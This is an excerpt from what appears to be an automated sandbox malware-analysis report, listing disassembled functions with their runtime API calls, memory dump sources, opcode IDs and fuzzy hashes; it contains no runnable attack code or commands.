                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 033bbb1c5a05f75b1dced10dee1e4bb721d609a0d4606901d0bc7b9c9dcb0c56
                                          • Instruction ID: 6d15a3a4836478fabdac8207f5df8289affbf850725ffece3d4fcc213a810a36
                                          • Opcode Fuzzy Hash: 033bbb1c5a05f75b1dced10dee1e4bb721d609a0d4606901d0bc7b9c9dcb0c56
                                          • Instruction Fuzzy Hash: 9E019231145225BBE3301A2AEC0EF977F98EF027B4F109316BAAC7A1E1C7B45854CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E63414 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E63600: try_get_function.LIBVCRUNTIME ref: 00E63615
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E63432
                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E6343D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                          • String ID:
                                          • API String ID: 806969131-0
                                          • Opcode ID: 8f2d47e2eb3c9322a7a26120f96702eed807625fec67c0d031c0fdc7ffaca1d7
                                          • Instruction ID: 24685179f14b48a02e52ff83982b9d61cbf62d72ca74ccd23b263aba77c3a938
                                          • Opcode Fuzzy Hash: 8f2d47e2eb3c9322a7a26120f96702eed807625fec67c0d031c0fdc7ffaca1d7
                                          • Instruction Fuzzy Hash: 8CD0A930AC8301A84C25ABB4B80309DA6809801BF83A03356E430F92C3EF20C3413012
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E4B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                          Download Yara Rule
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 00E4BB4E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID:
                                          • API String ID: 1385522511-0
                                          • Opcode ID: 98c3ff24d8cb4b0e1e2e02101f32352bc1820215a4c110230e651421c008a256
                                          • Instruction ID: 4fff29daffe4fad177b2dcd80671b64822db806816c8d5fd5fb3958053372cb5
                                          • Opcode Fuzzy Hash: 98c3ff24d8cb4b0e1e2e02101f32352bc1820215a4c110230e651421c008a256
                                          • Instruction Fuzzy Hash: 5432CB30A00209DFCF24CF54D894ABEB7B9EF48308F59A059E915BB261C775ED81DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E44ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E44E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E44E9C
                                            • Part of subcall function 00E44E90: GetProcAddress.KERNEL32 ref: 00E44EAE
                                            • Part of subcall function 00E44E90: FreeLibrary.KERNEL32 ref: 00E44EC0
                                          • LoadLibraryExW.KERNELBASE ref: 00E44EFD
                                            • Part of subcall function 00E44E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E44E62
                                            • Part of subcall function 00E44E59: GetProcAddress.KERNEL32 ref: 00E44E74
                                            • Part of subcall function 00E44E59: FreeLibrary.KERNEL32 ref: 00E44E87
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Library$Load$AddressFreeProc
                                          • String ID:
                                          • API String ID: 2632591731-0
                                          • Opcode ID: c39119252a0cb07dfe9a8fb3caf2658819c14422f60f808cd38d1defa03886b3
                                          • Instruction ID: 4f4df9f8cf0b26c3a6d5e97de7540f9d8fc96c9bf4e56092e095eb4d8d772e3b
                                          • Opcode Fuzzy Hash: c39119252a0cb07dfe9a8fb3caf2658819c14422f60f808cd38d1defa03886b3
                                          • Instruction Fuzzy Hash: C811E372700305ABCB14BF70EC02FAD77E5AF40B10F20A42EF546BA1D1EE709A499760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E78402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 785d40759ffc415f27517d2d27ed70a453b7496a4c38f8259153bead06069ea0
                                          • Instruction ID: fcb06b9c71d9d634afeaba011a716eba10c105f2fa87694d93f40e85cb711ea8
                                          • Opcode Fuzzy Hash: 785d40759ffc415f27517d2d27ed70a453b7496a4c38f8259153bead06069ea0
                                          • Instruction Fuzzy Hash: 6F11487190410AAFCB05DF58E9449DE7BF4EF48314F108059F818AB312EA70DA11CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E49A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: a57b4b71896cba527b22f0639098d49ef3269e167dad2277276b6f62e39d6a23
                                          • Instruction ID: 283cf4a2a3abdc387af2578ad0ec5cbf076f8abe7fdc4d40eefc744025a76194
                                          • Opcode Fuzzy Hash: a57b4b71896cba527b22f0639098d49ef3269e167dad2277276b6f62e39d6a23
                                          • Instruction Fuzzy Hash: F4114C312047059FD720CF06E880B67B7F9EF44754F10D42EE9ABAA652C770E949DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E75000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E74C7D: RtlAllocateHeap.NTDLL(00000008,00E41129,00000000,?,00E72E29,00000001,00000364,?,?,?,00E6F2DE,00E73863,00F11444,?,00E5FDF5,?), ref: 00E74CBE
                                          • _free.LIBCMT ref: 00E7506C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                          • Instruction ID: c2d0bff0180f7b1879258287233cc13a5a835d79b891e683464194a5c5254960
                                          • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                          • Instruction Fuzzy Hash: 5C012B732047045BE3218E65984195AFBE8FB85370F25451DE198A32C0E6706D05C774
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E6E469 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __alldvrm
                                          • String ID:
                                          • API String ID: 65215352-0
                                          • Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                          • Instruction ID: 640277859c1406d6b67a41c61a23d7b72229ea4b97e9e2ae3fcf200b165cada3
                                          • Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                          • Instruction Fuzzy Hash: D301B575950308AFDB24DFB4DC457AEB7ECEB00368F10956EE415B7240DA31990087A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E6E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                          • Instruction ID: b8eb17cdf11a3998efc85cafae312c082b743952add054f68e96690837f246e0
                                          • Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                          • Instruction Fuzzy Hash: C4F02D36550A1496D7313A75FD05B9E33D89F623B4F105715F525B33D2CB70D80186A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E74C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,00E41129,00000000,?,00E72E29,00000001,00000364,?,?,?,00E6F2DE,00E73863,00F11444,?,00E5FDF5,?), ref: 00E74CBE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 4815d78b99e4ce387eea17c277b3fc820d4131170b5b9c9076ce4f18075874fb
                                          • Instruction ID: fca9cdfb165727252f2019861ed268af999c6c28bfa6431f6343c3dddc3a2784
                                          • Opcode Fuzzy Hash: 4815d78b99e4ce387eea17c277b3fc820d4131170b5b9c9076ce4f18075874fb
                                          • Instruction Fuzzy Hash: 3EF0B4B1643224A6FB225F62AC05F9AB7C8BF417A4B1DE111F91DBA1D4CB31DC0086A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E73820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,00F11444,?,00E5FDF5,?,?,00E4A976,00000010,00F11440,00E413FC,?,00E413C6,?,00E41129), ref: 00E73852
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: a20f1b2574c87ba4c12b7482f5c2291f7297ea8a2e0b797283ebaddd8ba1f43e
                                          • Instruction ID: 3547a153486c303656d93628c8176f9e39d9081420111704cf2ff213a7d929b7
                                          • Opcode Fuzzy Hash: a20f1b2574c87ba4c12b7482f5c2291f7297ea8a2e0b797283ebaddd8ba1f43e
                                          • Instruction Fuzzy Hash: 84E0E53114122596F7652A77AC00FDA77C8AB427F4F15A222FC1CB65D1CB31DD01B1E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E74D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00E74D9C
                                            • Part of subcall function 00E729C8: HeapFree.KERNEL32(00000000,00000000), ref: 00E729DE
                                            • Part of subcall function 00E729C8: GetLastError.KERNEL32 ref: 00E729F0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorFreeHeapLast_free
                                          • String ID:
                                          • API String ID: 1353095263-0
                                          • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                          • Instruction ID: fbc5dff280968cebf565be23754f46e8870ea11c37ae899460a58b36c509c6f4
                                          • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                          • Instruction Fuzzy Hash: C8E092761403059F8720CF6CD400A82B7F4EF84324720C529EADDE3310D331E812CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E44F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 4bd615cc695867de7f66b2c850999f4cf1dfedb81ab00fd7e4ee8818baa76a35
                                          • Instruction ID: 3994a81bfbef88181a77ed0fd30d60e33ae119a3d2ef9d24ff20c51410ebbd5d
                                          • Opcode Fuzzy Hash: 4bd615cc695867de7f66b2c850999f4cf1dfedb81ab00fd7e4ee8818baa76a35
                                          • Instruction Fuzzy Hash: 1DF01CB1305752CFDB349F65E490956BBE4BF14319320A96EE1EAA2661C7319848DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E42DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLongPathNameW.KERNELBASE ref: 00E42DC4
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LongNamePath_wcslen
                                          • String ID:
                                          • API String ID: 541455249-0
                                          • Opcode ID: dc92a20e526c2ffd96f79b954a9db1c8ea828be7a2f0a84051adcd204d507ef4
                                          • Instruction ID: 0f6aab4bb52d6e418fb3a2038ac1802b8bad07b481293cb54be9f4b3cdabcc46
                                          • Opcode Fuzzy Hash: dc92a20e526c2ffd96f79b954a9db1c8ea828be7a2f0a84051adcd204d507ef4
                                          • Instruction Fuzzy Hash: 41E0CD726001245BCB10A2989C05FDA77DDDFC87D4F0400B1FD0DF7258D960AD84C651
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID:
                                          • API String ID: 2638373210-0
                                          • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                          • Instruction ID: 0754d8d74b6ccadf1a7efa839c685363b09f93b087d62a437550d94a21e24f6f
                                          • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                          • Instruction Fuzzy Hash: 92E0DFB0209B004FCF3C5A28A8517F777E89F4A300F00082EF69B93352E57228428A4D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E42B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E43837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E43908
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00E42B6B
                                            • Part of subcall function 00E430F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E4314E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$CurrentDirectory
                                          • String ID:
                                          • API String ID: 2619246295-0
                                          • Opcode ID: 60fad6e35e697b022fe223b766af3e06426cb74498499b225d217ba2e9530d0f
                                          • Instruction ID: 94d0a414e82a376f021ee5de6dbc68a3af64f4afdb28bd39b9eb9f9d4b724872
                                          • Opcode Fuzzy Hash: 60fad6e35e697b022fe223b766af3e06426cb74498499b225d217ba2e9530d0f
                                          • Instruction Fuzzy Hash: BEE0862170424407CA08FB75B8565AEF7D9DBD6755F40353EF242B31A3CE6545898251
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E8039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00E80704,?,?,00000000), ref: 00E803B7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 57fe7a093191346b065deb32a9d46b88e368fb7e519e9ccde43dc136fc9be68c
                                          • Instruction ID: 0cd696c910461c659d4f3299ca304a64bde9ea4b0f3ab533817766873ecb6ea3
                                          • Opcode Fuzzy Hash: 57fe7a093191346b065deb32a9d46b88e368fb7e519e9ccde43dc136fc9be68c
                                          • Instruction Fuzzy Hash: A6D06C3204010DBFDF028F85ED06EDA3BAAFB48754F114000BE5866020C732E821EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E41CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemParametersInfoW.USER32 ref: 00E41CBC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem
                                          • String ID:
                                          • API String ID: 3098949447-0
                                          • Opcode ID: 14126ab6f435094387aa61801611db27ac7f5b5f48c5f88553938393c23241a8
                                          • Instruction ID: df4ac21abf85d989e4da064012c141ae06923602e4601da8776efb3f329f56b7
                                          • Opcode Fuzzy Hash: 14126ab6f435094387aa61801611db27ac7f5b5f48c5f88553938393c23241a8
                                          • Instruction Fuzzy Hash: 8FC09236280309AFF6548BC0BC9AF907B65F34CB00F19C102F709A95E3C3A22820FA50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E45745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E45773
                                          • GetLastError.KERNEL32 ref: 00EB76DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
